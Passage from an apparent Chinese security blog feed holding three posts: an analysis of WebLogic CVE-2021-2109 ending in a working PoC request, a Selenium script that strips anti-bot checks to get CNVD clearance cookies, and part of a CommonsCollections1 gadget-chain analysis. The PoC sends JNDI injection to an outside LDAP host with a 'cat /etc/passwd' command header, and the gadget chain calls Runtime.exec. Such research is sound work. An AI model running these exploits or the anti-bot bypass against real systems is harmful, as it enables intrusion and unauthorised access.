bindName,前边有个 if 判断 serverMBean != null。</p><p>所以现在要jndi注入的话需要满足</p><ol><li><p>context、bindName 可控</p></li><li><p>serverMBean != null ,serverMBean 由 serverName 控制即 serverName 可控</p></li></ol><p> 跟一下 context、bindName、serverName ,三个参数都是由 bindingHandle 获取的,bindingHandle.getContext() 、 bindingHandle.getBinding()、 bindingHandle.getServer()</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">JndiBindingHandle bindingHandle = (JndiBindingHandle)this.getHandleContext(actionForm, request, "JNDIBinding");</span><br><span class="line">...</span><br><span class="line">DomainMBean domainMBean = MBeanUtils.getDomainMBean();</span><br><span class="line">String context = bindingHandle.getContext();</span><br><span class="line">String bindName = bindingHandle.getBinding();</span><br><span class="line">String serverName = bindingHandle.getServer();</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301163734492.png" alt="image-20210301163734492"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301163937364.png" alt="image-20210301163937364"></p><p>继续一路跟进到自身的 bindingHandle.getComponents() 方法</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> String[] getComponents() {</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">this</span>.components == <span class="keyword">null</span>) {</span><br><span class="line"> String serialized = <span class="keyword">this</span>.getObjectIdentifier();</span><br><span class="line"> ArrayList componentList = <span class="keyword">new</span> ArrayList();</span><br><span class="line"> StringBuffer currentComponent = <span class="keyword">new</span> StringBuffer();</span><br><span class="line"> <span class="keyword">boolean</span> lastWasSpecial = <span class="keyword">false</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i < serialized.length(); ++i) {</span><br><span class="line"> <span class="keyword">char</span> c = serialized.charAt(i);</span><br><span class="line"> <span class="keyword">if</span> (lastWasSpecial) {</span><br><span class="line"> <span class="keyword">if</span> (c == <span class="string">'0'</span>) {</span><br><span class="line"> <span class="keyword">if</span> (currentComponent == <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Handle component already null : '"</span> + serialized + <span class="string">'"'</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (currentComponent.length() > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Null handle component preceeded by a character : '"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> currentComponent = <span class="keyword">null</span>;</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="string">'\\'</span>) {</span><br><span class="line"> <span class="keyword">if</span> (currentComponent == <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Null handle followed by \\ : '"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> currentComponent.append(<span class="string">'\\'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (c != <span class="string">';'</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"\\ in handle followed by a character :'"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (currentComponent == <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Null handle followed by ; : '"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> currentComponent.append(<span class="string">';'</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> lastWasSpecial = <span class="keyword">false</span>;</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="string">'\\'</span>) {</span><br><span class="line"> <span class="keyword">if</span> (currentComponent == <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Null handle followed by \\ : '"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> lastWasSpecial = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="string">';'</span>) {</span><br><span class="line"> String component = currentComponent != <span class="keyword">null</span> ? currentComponent.toString() : <span class="keyword">null</span>;</span><br><span class="line"> componentList.add(component);</span><br><span class="line"> currentComponent = <span class="keyword">new</span> StringBuffer();</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (currentComponent == <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Null handle followed by a character : '"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> currentComponent.append(c);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (lastWasSpecial) {</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> AssertionError(<span class="string">"Last character in handle is \\ :'"</span> + serialized + <span class="string">"'"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> String component = currentComponent != <span class="keyword">null</span> ? currentComponent.toString() : <span class="keyword">null</span>;</span><br><span class="line"> componentList.add(component);</span><br><span class="line"> <span class="keyword">this</span>.components = (String[])((String[])componentList.toArray(<span class="keyword">new</span> String[componentList.size()]));</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>.components;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>大概逻辑就是将 bindingHandle 的 objectIdentifier 的用<code>;</code> 分割成数组 context、bindName 取数组的 第一位和第二位 serverName 取第三位。</p><p>bindingHandle 的 objectIdentifier 参数应该是在构造 bindingHandle 的时候赋值的,跟进 bindingHandle.getContext() 看下bindingHandle 是如何构造的。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301165414829.png" alt="image-20210301165414829"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301170029505.png" alt="image-20210301170029505"></p><p>一路跟进到 HandleUtils#getHandleContext(), 返回的 handle 是由 HandleUtils#getHandleContextFromRequest() 方法生成的,继续跟进</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301165708165.png" alt="image-20210301165708165"></p><p>跟进 HandleUtils#handleFromQueryString() 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301165854550.png" alt="image-20210301165854550"></p><p>HandleUtils#handleFromQueryString() 方法会遍历 request 的参数,当参数名以 handle 结尾时,用 ConvertUtils.convert () 方法处理参数值, ConvertUtils.convert () 方法的作用是转换类型在这里可以将字符串转换为 handle 对象,我们可以按照 ConvertUtils.convert 的格式构造 bindingHandle ,而 bindingHandle 属于 JndiBindingHandle 类,objectIdentifier 是在构造函数里设置的</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301171508289.png" alt="image-20210301171508289"></p><p>构造参数 xxxhandle=com.bea.console.handles.JndiBindingHandle(“context;bindName;serverName”) 就可以控制context、bindName、serverName 三个参数</p><p>前面说到需要让 serverMBean != null ,serverMBean 由 serverName 控制的,看 Payload 是让 serverName=AdminServer 就行 ,懒得去分析了。</p><p>最终带到 c.lookup 方法里的时候 context 和 bindName 之间会拼接一个 <code>.</code> 构造LDAP地址的时候得注意一下</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Object boundObj = c.lookup(context + <span class="string">"."</span> + bindName);</span><br></pre></td></tr></table></figure><p>POC</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&xxx handle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.43.43;23:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:7001</span><br><span class="line">cmd: cat /etc/passwd</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: ADMINCONSOLESESSION=p3w1g8hdgnFLy9xL72JlMLn5nwPgG2CsKb1myGZghXJT2K7STmwR!2140432006</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301173436178.png" alt="image-20210301173436178"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301173355897.png" alt="image-20210301173355897"></p><p><strong>才疏学浅,文笔垃圾,如有错误望师傅们斧正</strong></p>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> RCE </tag>
<tag> 漏洞分析 </tag>
<tag> Weblogic </tag>
</tags>
</entry>
<entry>
<title>傻瓜式绕过加速乐反爬机制</title>
<link href="2021/02/27/%E5%82%BB%E7%93%9C%E5%BC%8F%E7%BB%95%E8%BF%87%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC/"/>
<url>2021/02/27/%E5%82%BB%E7%93%9C%E5%BC%8F%E7%BB%95%E8%BF%87%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC/</url>
<content type="html"><![CDATA[<h1 id="加速乐是如何反爬的"><a href="#加速乐是如何反爬的" class="headerlink" title="加速乐是如何反爬的"></a>加速乐是如何反爬的</h1><p>以 cnvd 为例,访问会跳转两次,第一次返回 cookie <code> __jsluid_s=6a027a76583f43e463722e69d0247a0a</code>,并且页面会通过 js 设置cookie <code>__jsl_clearance_s=1614408251.231|-1|hWPBUGndFSVIOaYhUtUilmZPgng%3</code> 并跳转,如图</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC%E7%BB%95%E8%BF%87.assets/image-20210227144641727.png" alt="image-20210227144641727"></p><p>然后带着得到的 <code> __jsluid_s</code> 和 <code>__jsl_clearance_</code> 继续访问cnvd,这里是第一次跳转,返回的是一大堆 js 代码,混淆比较严重,解混淆后还是很难审计。这段 js 的主要作用就是重新生成 <code>__jsl_clearance_</code> 并且会检查一些常见的爬虫特征之类的,然后跳转。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC%E7%BB%95%E8%BF%87.assets/image-20210227145300400.png" alt="image-20210227145300400"></p><p>带着新生成的 cookie 第二次跳转访问 cnvd 就可以获取到真正的内容了,这个 cookie 有效时间大概有20分钟左右,而且这个 cookie 也就是 <code>__jsl_clearance_、</code> <code> __jsluid_s</code> 有对 User-Agent 签名,cookie 和 User-Agent 是对应的。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC%E7%BB%95%E8%BF%87.assets/image-20210227150311716.png" alt="image-20210227150311716"></p><h1 id="绕过思路"><a href="#绕过思路" class="headerlink" title="绕过思路"></a>绕过思路</h1><p>原来就是通过 selenium 模拟浏览器 去访问 cnvd ,获取 cookie 和 User-Agent,但是最近这个方法不行了,在第二次访问得到的那一堆 js 代码里应该检测机制,导致 selenium 访问的时候并不会第二次跳转</p><p>解混淆后可以发现,最终设置 cookie 和跳转的代码在这,测试了一下,用 selenium+chromedriver 模拟浏览器 去访问的话根本就没有执行到这,使用正常浏览器访问的话则能够执行到这并跳转。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC%E7%BB%95%E8%BF%87.assets/image-20210227151208568.png" alt="image-20210227151208568"></p><p>入口的函数是 go() ,可以看到在函数里有很多这种 if 然后 return !![] ,这里应该就是各种检测如果不满足就直接 return,</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E5%8A%A0%E9%80%9F%E4%B9%90%E5%8F%8D%E7%88%AC%E7%BB%95%E8%BF%87.assets/image-20210227151834477.png" alt="image-20210227151834477"></p><p>直接暴力点,把 js 代码扣出来, 然后直接把所有 return !![] 删了。让他能够执行到 设置 cookie 和 跳转的代码,设置 cookie 和跳转的代码是被包裹在 setTimeout 函数里的,会延时执行,所以还得把他从 setTimeout 扣出来。</p><p>还有一个坑,每次返回的 js 代码其实格式是有好几种的,所以正则得写好,而且我们只要获取 cookie 就行,所以把跳转的代码也直接删了。</p><p>上代码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_cookies</span>(<span class="params">self</span>):</span></span><br><span class="line"> chrome_options = Options()</span><br><span class="line"> chrome_options.add_argument(<span class="string">'--no-sandbox'</span>)</span><br><span class="line"> chrome_options.add_argument(<span class="string">'--disable-dev-shm-usage'</span>)</span><br><span class="line"> chrome_options.add_argument(<span class="string">'--headless'</span>)</span><br><span class="line"></span><br><span class="line"> chrome_options.add_argument(<span class="string">'user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'</span>)</span><br><span class="line"> <span class="comment">#chrome_options.add_argument("--proxy-server=http://127.0.0.1:8080")</span></span><br><span class="line"> driver = webdriver.Chrome(executable_path=<span class="string">'/pyspider/chromedriver'</span>,chrome_options=chrome_options)</span><br><span class="line"> driver.get(<span class="string">"https://www.cnvd.org.cn/"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># 扣出源码里的js </span></span><br><span class="line"> pageSource = driver.page_source</span><br><span class="line"> pageSource = pageSource.split(<span class="string">"<script>"</span>)[<span class="number">1</span>]</span><br><span class="line"> pageSource = pageSource.split(<span class="string">"</script>"</span>)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 处理js代码 </span></span><br><span class="line"> pageSource = <span class="string">"var t;"</span>+pageSource</span><br><span class="line"> temp_pageSource = pageSource.split(<span class="string">"setTimeout"</span>);</span><br><span class="line"> temp_pageSource[-<span class="number">1</span>] = re.sub(<span class="string">r'location\[.*?\](.*?)location\[.*?\](.*?)location\[.*?\](\;|\)\;|\;\}|\)\;\}),_0x(\w{3,7})\)\;'</span>, <span class="string">''</span>,temp_pageSource[-<span class="number">1</span>])</span><br><span class="line"> pageSource = <span class="string">'setTimeout'</span>.join(temp_pageSource)</span><br><span class="line"> pageSource = re.sub(<span class="string">r'_0x(\w{0,6})\[_0x(\w{0,6})\(\'0x(\w{0,6})\'\,\'.{0,6}\'\)\+\'\w{0,6}\'\]\(setTimeout\,function\(\)\{'</span>, <span class="string">''</span>, pageSource)</span><br><span class="line"> pageSource = re.sub(<span class="string">r'setTimeout\(function\(\)\{'</span>,<span class="string">''</span>, pageSource)</span><br><span class="line"> pageSource = pageSource.replace(<span class="string">"return!![];"</span>,<span class="string">""</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># 执行js代码 获取 __jsl_clearance_s</span></span><br><span class="line"> ccc = driver.execute_script(pageSource+<span class="string">";return document.cookie"</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 获取 cookie </span></span><br><span class="line"> cj = driver.get_cookies()</span><br><span class="line"> cookie = <span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> cj:</span><br><span class="line"> cookie += <span class="string">"'"</span>+c[<span class="string">'name'</span>] + <span class="string">"':'"</span> + c[<span class="string">'value'</span>] + <span class="string">"',"</span></span><br><span class="line"> cookie = ast.literal_eval(<span class="string">'{'</span>+cookie+<span class="string">'}'</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 把cookie 中的 __jsl_clearance_s 替换为新的</span></span><br><span class="line"> cookie[<span class="string">'__jsl_clearance_s'</span>]=ccc.split(<span class="string">"="</span>)[<span class="number">1</span>]</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 获取 user-agent</span></span><br><span class="line"> agent = driver.execute_script(<span class="string">"return navigator.userAgent"</span>)</span><br><span class="line"> </span><br><span class="line"> driver.quit()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> cookie,agent</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> 开发 </category>
</categories>
<tags>
<tag> 爬虫 </tag>
<tag> 加速乐 </tag>
<tag> 反爬 </tag>
</tags>
</entry>
<entry>
<title>CommonCollections1利用链分析</title>
<link href="2021/01/26/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90/"/>
<url>2021/01/26/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<p>CC1 链的关键在三个实现了Transformer接⼝的类 ChainedTransformer ConstantTransformer InvokerTransformer,Transformer 顾名思义就是一个转换器用来处理传入的对象,然后将处理完的对象返回。</p><p>** commons-collections-3.1.jar!/org/apache/commons/collections/Transformer.class **</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126111742092.png" alt="image-20210126111742092"></p><h3 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h3><p>先来看 InvokerTransformer 类是如何实现 transform 方法的</p><p>org.apache.commons.collections.functors.InvokerTransformer.class#transform()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126111944377.png" alt="image-20210126111944377"></p><p>获取传入对象的类,接着利用反射执行类中的任意方法,其中 this.iMethodName, this.iParamTypes, this.iArgs 都是可控的在构造函数中赋值。 这部分就是 CC1 链最终执行命令的地方,传入一个 Runtime 类对象,利用反射执行 exec 方法。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126112806087.png" alt="image-20210126112806087"></p><p>所以直接找到⼀个类,它在反序列化的 readObject 里直接或间接调用了 InvokerTransformer 的 transform 方法,并且参数可控,是这样吗?肯定不是我们都知道待序列化的对象和所有它使⽤的内部属性对象,必须都实现了 <strong>java.io.Serializable</strong> 接⼝。我们需要传给 transform 方法的参数是 Runtime 对象,在序列化的时候肯定也属于内部属性对象,而它是没有实现 <strong>java.io.Serializable</strong> 接⼝的,所以即使找到了符合条件的类也没办法构造成序列化数据。</p><h3 id="ChainedTransformer"><a href="#ChainedTransformer" class="headerlink" title="ChainedTransformer"></a>ChainedTransformer</h3><p>接着来看第二个 ChainedTransformer 类是如何实现 transform 接口的</p><p>org.apache.commons.collections.functors.ChainedTransformer.class#transform()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126145247617.png" alt="image-20210126145247617"></p><p>按顺序调用 Transformer 数组 this.iTransformers 中所有 Transformer 对象的 transform 方法,并且每次调用的结果传递给下一个 Transformer#transform() 作为参数。就像一个车间,每个工人处理完零件后交给下一个环节的工人处理,最后输出成品。</p><p>利用它我们可以构造 Transformer 数组 通过 ChainedTransformer#transform() 的链式调用机制+java的反射机制在反序列化时构造出 Runtime 对象,而不是在序列化之前就实例化 Runtime 对象。这样就可以解决 Runtime 不能序列化的问题。</p><p>这是通过反射获取 Runtime 对象的方法</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Class clazz = Class.forName("java.lang.Runtime");</span><br><span class="line">Method getRuntimeMethod = clazz.getMethod("getRuntime");</span><br><span class="line">Runtime runtime = (Runtime) getRuntimeMethod.invoke(null);</span><br><span class="line">runtime.exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");</span><br></pre></td></tr></table></figure><p>用 ChainedTransformer#transform() 链式调用机制的写法就是</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = new Transformer[]{</span><br><span class="line"> new InvokerTransformer(</span><br><span class="line"> "forName",</span><br><span class="line"> new Class[] {String.class},</span><br><span class="line"> new Object[] {"java.lang.Runtime"}</span><br><span class="line"> ),</span><br><span class="line"> new InvokerTransformer(</span><br><span class="line"> "getMethod",</span><br><span class="line"> new Class[] {String.class,Class[].class},</span><br><span class="line"> new Object[] {"getRuntime",new Class[0]}</span><br><span class="line"> ),</span><br><span class="line"> new InvokerTransformer("invoke", new Class[] {</span><br><span class="line"> Object.class, Object[].class }, new Object[] {</span><br><span class="line"> null, new Object[0] }),</span><br><span class="line"> new InvokerTransformer(</span><br><span class="line"> "exec",</span><br><span class="line"> new Class[] {String.class},</span><br><span class="line"> new String[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line">};</span><br><span class="line"></span><br><span class="line">ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);</span><br><span class="line">chainedTransformer.transform(Class.class);</span><br></pre></td></tr></table></figure><p>最后调用 ChainedTransformer#transform() 即可,参数为 class对象(Class.class) </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126162519139.png" alt="image-20210126162519139"></p><p>把 chainedTransformer 序列化试试</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126163910723.png" alt="image-20210126163910723"></p><p>没报错,现在还需要找到一个类,在反序列化的 readObject 里直接或间接调用了 ChainedTransformer 的 transform 方法</p><p>并且调用 transform() 方法是参数可控,因为链式调用的起点 为 class对象(Class.class),是我们传入 transform() 方法的参数。这样条件有些苛刻了,即使参数可控,参数类型也对不上。继续想办法减少条件。</p><h2 id="ConstantTransformer"><a href="#ConstantTransformer" class="headerlink" title="ConstantTransformer"></a>ConstantTransformer</h2><p>我们看 ConstantTransformer 是如何实现 Transformer 接口的,直接返回了 this.iConstant ,this.iConstant 是在实例化对象时在构造函数里传⼊的⼀个对象。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126175849253.png" alt="image-20210126175849253"></p><p>简单来说它的作用就是 包裹一个对象,在调用其 transform 方法时返回这个对象。</p><p>前边说到使用 ChainedTransformer#transform() 方法链式调用的起点是传入 transform() 方法的参数,也就是 class 对象(Class.class)。我们用 ConstantTransformer 包裹一个 class 对象,把它放到我们构造的 Transformer 